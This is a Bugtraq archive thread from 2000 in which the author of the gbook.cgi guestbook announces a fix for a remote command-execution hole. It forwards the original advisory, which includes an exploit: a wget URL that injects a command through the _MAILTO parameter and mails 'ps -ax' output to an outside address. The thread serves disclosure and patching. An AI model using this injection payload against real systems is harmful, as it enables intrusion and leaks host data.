Bugtraq mailing list archives
Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick <nbs () SONIC NET>
Date: Sat, 11 Nov 2000 19:00:58 -0800
So far as I can tell, it's fixed... Please let me know if anyone sees any other glaring holes. It IS rather ancient software. -bill! Forwarded message:
From mbrennen () fni com Sat Nov 11 10:28:17 2000 X-envelope-info: <mbrennen () fni com> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST) From: Michael Brennen <mbrennen () fni com> To: William Kendrick <nbs () sonic net> Cc: mat () hacksware com Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability (fwd) In-Reply-To: <200011110920.eAB9KVL11974 () sonic net> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000 () henry fni com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII You might want to post this to bugtraq. -- Michael On Sat, 11 Nov 2000, William Kendrick wrote:Should be fixed, thanks. I wonder why I wasn't informed directly! My @zippy.sonoma.edu address _should_ still be getting forwarded to my new addr. New download available at: ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz Modification date: November 11, 2000. -bill!Don't know if you saw this or not; you probably have by now. There are a couple of vulnerable sprintf() also that should be replaced by snprintf(). -- Michael ---------- Forwarded message ---------- Date: Fri, 10 Nov 2000 20:38:44 +0900 From: JW Oh <mat () IVNTECH COM> To: BUGTRAQ () SECURITYFOCUS COM Subject: [hacksware] gbook.cgi remote command execution vulnerability Bug Report 1. Name: gbook.cgi remote command execution vulnerability 2. Release Date: 2000.11.10 3. Affected Application: GBook - A web site guestbook By Bill Kendrick kendrick () zippy sonoma edu http://zippy.sonoma.edu/kendrick/ 4. Author: mat () hacksware com 5. Type: Input validation Error 6. Explanation gbook.cgi is used by some web sites. We can set _MAILTO parameter, and popen is called to execute mail command. If ';' is used in _MAILTO variable, you can execute arbitrary command with it. It's so trivial. :) 7. Exploits This exploit executes "ps -ax" command and sends the result to haha () yaho com. wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few" ================================================= | mat () hacksware com | | http://hacksware.com | =================================================
Current thread:
- Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED] William Kendrick (Nov 13)